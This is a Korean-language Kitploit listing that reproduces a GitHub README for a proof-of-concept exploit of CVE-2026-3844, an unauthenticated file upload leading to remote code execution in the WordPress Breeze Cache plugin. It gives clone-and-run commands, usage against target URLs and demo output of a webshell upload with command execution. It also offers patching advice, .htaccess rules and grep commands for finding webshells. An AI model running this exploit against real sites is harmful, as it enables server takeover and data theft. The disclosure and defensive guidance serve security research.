Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-3844 — CVE-2026-3844에 대한 PoC 익스플로잇으로, WordPress Breeze 플러그인에서 인증되지 않은 파일 업로드를 허용하여 RCE(원격 코드 실행)로 이어지는 치명적인 취약점입니다. | Kitploit
도구/GitHubGitHub/tausifzaman/cve-2026-3844
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

CVE-2026-3844에 대한 PoC 익스플로잇으로, WordPress Breeze 플러그인에서 인증되지 않은 파일 업로드를 허용하여 RCE(원격 코드 실행)로 이어지는 치명적인 취약점입니다.

저장소 보기
33개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-3844

CVE-2026-3844에 대한 PoC 익스플로잇으로, WordPress Breeze 플러그인에서 원격 코드 실행(RCE)으로 이어지는 치명적인 인증 없는 파일 업로드 취약점입니다.

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 개요

CVE-2026-3844는 Breeze Cache WordPress 플러그인(Cloudways 제작)의 치명적인(Critical) 인증 없는 임의 파일 업로드 취약점으로, 2.4.4 이하의 모든 버전에 영향을 미칩니다.

이 저장소는 승인된 보안 연구, 침투 테스트 및 책임 있는 공개를 위한 개념 증명(PoC) 익스플로잇(CVE-2026-3844.py)을 제공합니다.


한 줄 코드

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 취약점 요약


🔍 취약점 세부 정보

근본 원인

WordPress용 Breeze Cache 플러그인은 "Host Files Locally – Gravatars" 기능이 활성화되면 원격 Gravatar 이미지를 가져와 로컬에 저장합니다. class-breeze-cache-cronjobs.php(89~119행)의 취약한 함수 fetch_gravatar_from_remote는 가져온 원격 콘텐츠에 대해 파일 유형 또는 확장자 검증을 전혀 수행하지 않습니다.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

공격 흐름

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

영향

성공적으로 악용될 경우 공격자는 다음을 수행할 수 있습니다:

  • 🔴 임의의 운영체제 명령 실행 (RCE)
  • 🔴 지속성 있는 백도어 / 웹셸 업로드
  • 🔴 불법 WordPress 관리자 계정 생성
  • 🔴 데이터베이스, 자격 증명 및 민감한 파일 유출
  • 🔴 웹사이트 변조 또는 모든 콘텐츠 삭제
  • 🔴 서버를 이용해 동일 네트워크의 다른 시스템으로 피벗
  • 🔴 서버를 봇넷에 편입

⚙️ 요구 사항

  • Python 3.6+
  • requests 라이브러리
  • "Host Files Locally – Gravatars"가 활성화된 Breeze Cache ≤ 2.4.4를 실행 중인 대상 사이트

🚀 설치 및 설정

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (원라이너)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (설정 불필요)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 사용법

root@kitploit:~
python3 CVE-2026-3844.py

옵션

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

예제

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ PoC 데모 출력

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 완화 및 대응

✅ 즉시 조치

Breeze Cache를 버전 2.4.5 이상으로 업데이트하세요 — 이것이 유일한 완전한 해결책입니다.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ 임시 완화 조치 (즉시 업데이트할 수 없는 경우)

  1. Breeze Cache 설정에서 "Host Files Locally – Gravatars" 옵션을 비활성화합니다
  2. WAF 규칙 또는 .htaccess를 통해 취약한 엔드포인트를 차단합니다
  3. 업로드 및 캐시 디렉터리에서 PHP 실행을 차단합니다:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. 새로 생성되거나 수정된 의심스러운 파일을 검색합니다:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Gravatar 가져오기 기능을 대상으로 하는 의심스러운 POST 요청을 WAF를 통해 차단합니다
  2. /wp-content/breeze-cache/*.php 요청에 대한 액세스 로그를 모니터링합니다
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 이미 침해되었는지 확인

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 참고 자료


👤 작성자

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

보안 연구원 · 버그 바운티 헌터 · 도구 개발자

Android · Python · PHP · 웹 보안 · 침투 테스트


⚠️ 법적 고지

이 저장소와 포함된 익스플로잇 코드는 오직 교육 목적과 승인된 보안 연구를 위해서만 제공됩니다.

  • ✅ 소유한 시스템 또는 테스트에 대한 명시적 서면 허가를 받은 시스템에서만 이 도구를 사용할 수 있습니다
  • ❌ 제3자 시스템에 대한 무단 사용은 미국 컴퓨터 사기 및 남용법(CFAA), 영국 컴퓨터 남용법(Computer Misuse Act) 및 전 세계의 동등한 법률에 따라 불법입니다
  • 작성자는 이 도구로 인한 오용, 손상 또는 불법 활동에 대해 일체의 책임을 지지 않습니다

윤리적으로 해킹하고, 책임감 있게 신고하며, 합법적으로 행동하세요. 🛡️


⭐ 이 도구가 연구에 도움이 되었다면 저장소에 스타를 남겨주세요! ⭐

Star   Follow   Website

도구 다운로드
필드세부 정보
CVE IDCVE-2026-3844
플러그인Breeze Cache (Cloudways)
영향받는 버전2.4.4 이하 모든 버전
패치 버전Breeze 2.4.5+
취약점 유형CWE-434 — 위험한 유형의 파일 무제한 업로드
CVSS v3.1 점수9.8 (CRITICAL)
CVSS v2.0 점수10.0 (CRITICAL)
CVSS 벡터CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
공격 경로네트워크 (원격)
인증 필요❌ 없음 — 인증 불필요
조건"Host Files Locally – Gravatars"가 활성화되어 있어야 함 (기본값은 비활성화)
영향기밀성: 높음 · 무결성: 높음 · 가용성: 높음
공개일2026-04-23
출처Wordfence / NVD / MITRE
PoCTausif Zaman
출처링크
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Wordfence Advisorywordfence.com – Threat Intel
🔗 WordPress 플러그인 변경 로그plugins.trac.wordpress.org/changeset/3511463/breeze
🔗 취약 코드 (L89)class-breeze-cache-cronjobs.php#L89
🔗 취약 코드 (L119)class-breeze-cache-cronjobs.php#L119
🔗 GitHub AdvisoryGHSA-c529-q7mw-hq6j
🔗 PoC 저장소github.com/tausifzaman/CVE-2026-3844